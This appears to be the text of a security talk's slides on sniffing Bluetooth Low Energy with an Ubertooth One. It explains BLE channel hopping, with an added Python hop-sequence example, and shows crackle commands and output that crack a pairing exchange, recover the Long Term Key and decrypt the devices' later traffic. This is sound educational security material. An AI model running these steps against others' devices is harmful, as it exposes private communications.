#whoami
Jiggyasu Sharma
• A security N00b
• I hack for bread and b33r
• I write [crape]
• I shoot [by camera]
Bluetooth
• Bluetooth is a wireless technology standard for exchanging data over short distances (using short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz) from fixed and mobile devices, and building personal area networks (PANs). (wiki)
History
• Named after the 10th-century king Harald Bluetooth
• Proposed by Jim Kardach
• In 1997
• A system for communication between phone and computer
• BSIG
Capability
• Wireless
• Short range
• Less energy
• Cheap
• Personal
• Easy
• Multipoint
• Frequency hopping
• [in]secure
Where it is being used
• Phone/Computer/Camera/Speaker
• Watch/Fitness band/Car/Door locks
• Cooker/Coffee machine/Trimmer/Dryer
• Medical devices: ventilator/blood glucose monitor
• Payment solutions
• 7 Million Devices
Difference
• The two cannot communicate with each other
• PHY and data link layers are completely different
• Higher-level protocols are reused [L2CAP…]
Hopping
• Hop along 37 data channels
• One data packet per channel
• Next channel = (channel + hop increment) mod 37
• Example with hop increment = 7: 3 → 10 → 17 → 24 → 31 → 1 → 8 → 15 → …
Capturing Packets
• Configure the CC2400
• Follow connections according to the hop pattern
• Hand off bits to the ARM MCU
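The hop rule on the "Hopping" slide is what a sniffer like Ubertooth has to reproduce to stay on the connection it is following ("follow connections according to the hop pattern"). The Python below is an added illustration, not code from the talk or from the Ubertooth project: `next_channel` is exactly the slide's formula, `hop_sequence` reproduces the slide's 3 → 10 → 17 → … example, and `remap_channel` goes one step beyond the slide by applying the channel-map remapping of the Bluetooth Core Specification's Channel Selection Algorithm #1 (the step a real connection takes when the computed channel is marked unused). The range check on the hop increment (5..16) is from the specification; the channel-map values in the demo are constructed.

```python
"""Worked example of the BLE data-channel hop sequence from the slide.

Added illustration, not the talk's or the Ubertooth project's code.
The unmapped hop rule is the slide's formula:
    next = (channel + hop_increment) mod 37
The remapping step is Channel Selection Algorithm #1 from the Bluetooth
Core Specification (Vol 6, Part B, 4.5.8.2); the slide does not show it.
"""
from typing import List

NUM_DATA_CHANNELS = 37  # data channels 0..36; 37, 38, 39 are advertising channels
ALL_CHANNELS = (1 << NUM_DATA_CHANNELS) - 1  # 37-bit channel map, every channel in use


def next_channel(channel: int, hop_increment: int) -> int:
    """Unmapped next channel, as on the slide: (channel + hop) mod 37.

    The specification restricts hopIncrement to 5..16; a sniffer fed a
    bogus value should fail loudly rather than follow a wrong sequence.
    """
    if not 5 <= hop_increment <= 16:
        raise ValueError(f"hop increment {hop_increment} outside the spec range 5..16")
    if not 0 <= channel < NUM_DATA_CHANNELS:
        raise ValueError(f"channel {channel} is not a data channel")
    return (channel + hop_increment) % NUM_DATA_CHANNELS


def remap_channel(unmapped: int, channel_map: int) -> int:
    """Channel Selection Algorithm #1 remapping (beyond the slide).

    channel_map is a 37-bit mask; bit n set means data channel n is in use.
    A used channel is kept; an unused one becomes
    used_channels[unmapped mod len(used_channels)].
    """
    used = [ch for ch in range(NUM_DATA_CHANNELS) if channel_map >> ch & 1]
    if len(used) < 2:
        raise ValueError("a BLE connection needs at least two used data channels")
    if channel_map >> unmapped & 1:
        return unmapped
    return used[unmapped % len(used)]


def hop_sequence(start: int, hop_increment: int, count: int,
                 channel_map: int = ALL_CHANNELS) -> List[int]:
    """Channels a sniffer must tune to for `count` consecutive connection events.

    `start` is the unmapped channel of the first event. With the default
    all-channels map the result is the slide's unmapped sequence.
    """
    seq = []
    unmapped = start
    for _ in range(count):
        seq.append(remap_channel(unmapped, channel_map))
        unmapped = next_channel(unmapped, hop_increment)  # state stays unmapped
    return seq


def visits_every_channel(hop_increment: int) -> bool:
    """37 is prime, so any legal increment walks all 37 channels in 37 events."""
    return sorted(hop_sequence(0, hop_increment, NUM_DATA_CHANNELS)) == list(range(NUM_DATA_CHANNELS))


if __name__ == "__main__":
    # The slide's example: start on channel 3 with hop increment 7.
    print(" -> ".join(str(c) for c in hop_sequence(3, 7, 8)))
    # Constructed channel map with channels 0..4 marked unused (e.g. Wi-Fi overlap).
    partial_map = ALL_CHANNELS & ~0b11111
    print(hop_sequence(31, 7, 4, partial_map))
```

With the all-channels map the output is the slide's sequence; with the constructed partial map the step from 31 lands on unmapped channel 1, which is unused, so the connection (and a correct sniffer) moves to the second used channel, 6, instead.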
Key Exchange Protocol
• Three-stage process
• 3 pairing methods: Just Works, 6-digit PIN, OOB
• “None of the pairing methods provide protection against a passive eavesdropper” - Bluetooth Core Spec
Required setup
• Bluetooth pairing devices (BLE/BTLE capable)
• Ubertooth One
• Linux system (Ubuntu/Kali works well)
• Ubertooth config
• Kismet
• Wireshark
• Crackle
Install Ubertooth tools
• ubertooth: basic functionality for spectrum analysis, Bluetooth sniffing and firmware updates
Ubertooth Spectrum Analyzing (before Kismet)
• Connect the Ubertooth One to your USB port
• If you are using a virtual machine, enable it under Devices/USB Ports and select the Ubertooth One
• Two green LEDs (RST and 1.8V) and the red LED (USB LED) indicate that the Ubertooth can communicate via the USB port
• Install Wireshark with the Wireshark Bluetooth baseband plugin so the file captured by Kismet can be analyzed
Hand the pcap file to crackle
isaias@ubuntu:~/crackle-sample# crackle -i ltk_exchange.pcap -o decrypted.pcap
TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)
Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3
To listen in on future communications between the two devices, use the captured LTK:
isaias@ubuntu:~/crackle-sample# crackle -i encrypted_known_ltk.pcap -o decrypted2.pcap -l 7f62c053f104a5bbe68b1d896a2ed49c
Warning: packet is too short to be encrypted (1), skipping
Warning: packet is too short to be encrypted (2), skipping
Warning: could not decrypt packet! Copying as is..
Warning: could not decrypt packet! Copying as is..
Warning: could not decrypt packet! Copying as is..
Warning: invalid packet (length to long), skipping
Done, processed 297 total packets, decrypted 7
References
• http://ubertooth.sourceforge.net/
• https://github.com/greatscottgadgets/ubertooth/
• https://www.kismetwireless.net/
• http://tools.kali.org/wireless-attacks/crackle
• http://www.nist.gov/customcf/get_pdf.cfm?pub_id=911133
Thank you all, and special thanks to…
• Philips and team
• Minatee Mishra
• Anirudh Duggal
• Sanjog Panda
• Pardhiv Reddy
• Ajay Pratap Singh
• Geethu Arvind